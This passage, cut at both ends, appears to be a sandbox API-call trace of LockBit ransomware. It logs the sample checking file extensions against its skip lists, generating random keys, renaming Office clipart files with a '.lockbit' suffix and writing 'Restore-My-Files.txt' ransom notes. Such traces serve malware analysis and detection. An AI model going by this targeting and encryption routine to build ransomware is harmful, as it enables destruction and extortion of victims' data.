lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.232] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.232] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.232] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.232] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.232] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.232] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.232] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.lockbit") returned 72 [0112.232] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0112.233] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.233] malloc (_Size=0x40068) returned 0x3d70450 [0112.234] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2960) returned 1 [0112.234] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.235] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0112.235] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.236] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0112.236] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0112.241] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.241] malloc (_Size=0xa6) returned 0x77d7a8 [0112.241] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.242] free (_Block=0x77d7a8) [0112.242] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.242] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.242] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.242] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe04, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01157_.WMF", cAlternateFileName="")) returned 1 [0112.242] lstrcmpiW (lpString1=".", lpString2="DD01157_.WMF") returned -1 [0112.242] lstrcmpiW (lpString1="..", lpString2="DD01157_.WMF") returned -1 [0112.242] PathFindExtensionW (pszPath="DD01157_.WMF") returned=".WMF" [0112.242] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.242] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.242] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.243] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.244] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.244] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.245] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01157_.WMF") returned 1 [0112.245] lstrcmpiW (lpString1="ntldr", lpString2="DD01157_.WMF") returned 1 [0112.245] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01157_.WMF") returned 1 [0112.245] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01157_.WMF") returned -1 [0112.245] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01157_.WMF") returned -1 [0112.245] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01157_.WMF") returned 1 [0112.245] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01157_.WMF") returned 1 [0112.245] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.245] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned=".WMF" [0112.245] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.245] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.245] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.245] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.245] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.245] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.245] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.245] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.245] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.245] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.245] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.245] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.246] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.246] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.lockbit") returned 72 [0112.246] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0112.257] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.257] malloc (_Size=0x40068) returned 0x3e70008 [0112.257] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=3588) returned 1 [0112.257] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.257] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0112.258] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.258] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0112.258] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0112.265] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.265] malloc (_Size=0xa6) returned 0x77d7a8 [0112.265] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.266] free (_Block=0x77d7a8) [0112.266] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.266] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.266] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.266] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01160_.WMF", cAlternateFileName="")) returned 1 [0112.266] lstrcmpiW (lpString1=".", lpString2="DD01160_.WMF") returned -1 [0112.266] lstrcmpiW (lpString1="..", lpString2="DD01160_.WMF") returned -1 [0112.266] PathFindExtensionW (pszPath="DD01160_.WMF") returned=".WMF" [0112.266] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.266] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.266] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.266] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.266] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.266] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.266] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.266] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.267] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.267] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.268] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01160_.WMF") returned 1 [0112.268] lstrcmpiW (lpString1="ntldr", lpString2="DD01160_.WMF") returned 1 [0112.268] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01160_.WMF") returned 1 [0112.268] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01160_.WMF") returned -1 [0112.268] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01160_.WMF") returned -1 [0112.268] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01160_.WMF") returned 1 [0112.268] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01160_.WMF") returned 1 [0112.268] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.268] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned=".WMF" [0112.268] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.269] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.269] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.270] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.lockbit") returned 72 [0112.270] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0112.270] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.270] malloc (_Size=0x40068) returned 0x3ef0008 [0112.270] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=2228) returned 1 [0112.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0112.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0112.271] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0112.276] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.276] malloc (_Size=0xa6) returned 0x77d7a8 [0112.276] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.277] free (_Block=0x77d7a8) [0112.277] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.277] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.278] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.278] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01162_.WMF", cAlternateFileName="")) returned 1 [0112.278] lstrcmpiW (lpString1=".", lpString2="DD01162_.WMF") returned -1 [0112.278] lstrcmpiW (lpString1="..", lpString2="DD01162_.WMF") returned -1 [0112.278] PathFindExtensionW (pszPath="DD01162_.WMF") returned=".WMF" [0112.278] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.278] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.278] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.278] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.278] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.278] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.278] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.278] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.278] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.278] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.278] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.278] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.278] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.278] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.278] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.279] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned 